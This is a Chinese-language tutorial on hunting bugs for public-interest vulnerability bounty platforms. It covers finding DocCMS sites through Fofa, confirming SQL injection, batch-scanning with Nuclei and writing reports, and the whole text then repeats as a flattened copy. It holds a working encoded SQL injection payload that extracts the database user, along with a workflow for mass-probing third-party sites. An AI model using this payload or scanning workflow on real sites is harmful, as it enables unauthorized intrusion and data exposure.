公益SRC漏洞挖掘与上分实战指南

一、前期准备工作

1.1 工具准备清单

测绘平台：
- Fofa
- Shodan
- 360Quake
- 奇安信Hunter
辅助工具：
- Fofa_viewer (GitHub开源工具)
- Nuclei (漏洞批量检测工具)
- 批量权重查询工具
- 批量备案查询工具
知识库：
- 佩奇文库 (http://wiki.peiqi.tech/wiki/cms/)

1.2 环境配置建议

安装Python环境 (建议3.7+)
配置Nuclei环境 (参考官方文档)
注册测绘平台账号 (获取API权限)

二、目标资产发现与筛选

2.1 使用测绘平台搜索目标

搜索语法构建：
- 优先使用CMS指纹特征
- 结合漏洞特征构建搜索语句
- 示例：app="DocCMS" && country="CN"
结果导出：
- 使用Fofa_viewer导出HOST字段
- 保存为txt格式 (如targets.txt)

2.2 资产筛选原则

优先国内目标 (符合SRC平台要求)
排除政府、教育等敏感目标
优先选择企业官网、商业系统

三、漏洞验证与利用

3.1 漏洞信息收集

佩奇文库使用：
- 按CMS类型查找已知漏洞
- 重点关注有公开POC的漏洞
- 记录漏洞特征和验证方法
POC选择原则：
- 优先选择无害验证方式
- 避免破坏性操作
- 示例：SQL注入仅验证不回显数据

3.2 单点漏洞验证

SQL注入验证示例：

http://example.com/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33

验证点：返回结果中包含数据库用户名称、数据库地址

文件上传验证：
- 上传phpinfo而非webshell
- 验证上传路径可访问性

四、批量漏洞检测

4.1 Nuclei工具使用

基本命令：

nuclei -l urls.txt -t DocCMS-keyword-SQLi.yaml -o results.txt -nm -retries 10 -timeout 30

参数说明：

-l: 目标列表文件
-t: 模板文件
-o: 输出结果文件
-nm: 简化输出
-retries: 重试次数
-timeout: 超时时间(秒)

模板编写：
参考官方文档学习YAML模板编写
示例模板仓库：https://github.com/moekylin/Security

4.2 结果处理

提取根域名：

awk -F 'search' '{print $1}' results.txt > domains.txt

结果去重：
使用sort和uniq命令处理重复结果

五、报告准备与提交

5.1 目标信息收集

权重查询：
- 使用爱站工具 (http://seo.iis7.com/)
- 关注百度权重(>=1)和Google权重(>=3)
- 不同SRC平台有不同权重要求
备案查询：
- 聚查 (http://www.jucha.com/beian/) 免费额度500条/天
- 站长之家 (https://icp.chinaz.com/) 单条查询

5.2 报告编写要点

包含完整漏洞验证过程
提供无害化验证证据
准确描述影响范围
提供修复建议

六、效率提升技巧

自动化脚本开发：
- 使用Python requests库编写验证脚本
- 开发批量查询工具整合工作流
知识积累：
- 建立本地漏洞库
- 记录常见CMS指纹特征
- 积累测绘平台搜索语法
工具链优化：
- 配置Nuclei模板库
- 开发结果自动处理脚本

七、注意事项

严格遵守各SRC平台规则
禁止未经授权的深入测试
避免对目标系统造成影响
敏感目标需特别谨慎处理
注意法律风险，保留测试授权证明

附录：常用资源

佩奇文库：http://wiki.peiqi.tech
Nuclei文档：https://nuclei.projectdiscovery.io/
Fofa语法：https://fofa.info/
漏洞提交平台：
- 补天
- 漏洞盒子
- CNVD
- CNNVD

公益SRC漏洞挖掘与上分实战指南一、前期准备工作 1.1 工具准备清单测绘平台： Fofa Shodan 360Quake 奇安信Hunter 辅助工具： Fofa_ viewer (GitHub开源工具) Nuclei (漏洞批量检测工具) 批量权重查询工具批量备案查询工具知识库：佩奇文库 (http://wiki.peiqi.tech/wiki/cms/) 1.2 环境配置建议安装Python环境 (建议3.7+) 配置Nuclei环境 (参考官方文档) 注册测绘平台账号 (获取API权限) 二、目标资产发现与筛选 2.1 使用测绘平台搜索目标搜索语法构建：优先使用CMS指纹特征结合漏洞特征构建搜索语句示例： app="DocCMS" && country="CN" 结果导出：使用Fofa_ viewer导出HOST字段保存为txt格式 (如targets.txt) 2.2 资产筛选原则优先国内目标 (符合SRC平台要求) 排除政府、教育等敏感目标优先选择企业官网、商业系统三、漏洞验证与利用 3.1 漏洞信息收集佩奇文库使用：按CMS类型查找已知漏洞重点关注有公开POC的漏洞记录漏洞特征和验证方法 POC选择原则：优先选择无害验证方式避免破坏性操作示例：SQL注入仅验证不回显数据 3.2 单点漏洞验证 SQL注入验证示例：验证点：返回结果中包含数据库用户名称、数据库地址文件上传验证：上传phpinfo而非webshell 验证上传路径可访问性四、批量漏洞检测 4.1 Nuclei工具使用基本命令：参数说明： -l : 目标列表文件 -t : 模板文件 -o : 输出结果文件 -nm : 简化输出 -retries : 重试次数 -timeout : 超时时间(秒) 模板编写：参考官方文档学习YAML模板编写示例模板仓库：https://github.com/moekylin/Security 4.2 结果处理提取根域名：结果去重：使用sort和uniq命令处理重复结果五、报告准备与提交 5.1 目标信息收集权重查询：使用爱站工具 (http://seo.iis7.com/) 关注百度权重(>=1)和Google权重(>=3) 不同SRC平台有不同权重要求备案查询：聚查 (http://www.jucha.com/beian/) 免费额度500条/天站长之家 (https://icp.chinaz.com/) 单条查询 5.2 报告编写要点包含完整漏洞验证过程提供无害化验证证据准确描述影响范围提供修复建议六、效率提升技巧自动化脚本开发：使用Python requests库编写验证脚本开发批量查询工具整合工作流知识积累：建立本地漏洞库记录常见CMS指纹特征积累测绘平台搜索语法工具链优化：配置Nuclei模板库开发结果自动处理脚本七、注意事项严格遵守各SRC平台规则禁止未经授权的深入测试避免对目标系统造成影响敏感目标需特别谨慎处理注意法律风险，保留测试授权证明附录：常用资源佩奇文库：http://wiki.peiqi.tech Nuclei文档：https://nuclei.projectdiscovery.io/ Fofa语法：https://fofa.info/ 漏洞提交平台：补天漏洞盒子 CNVD CNNVD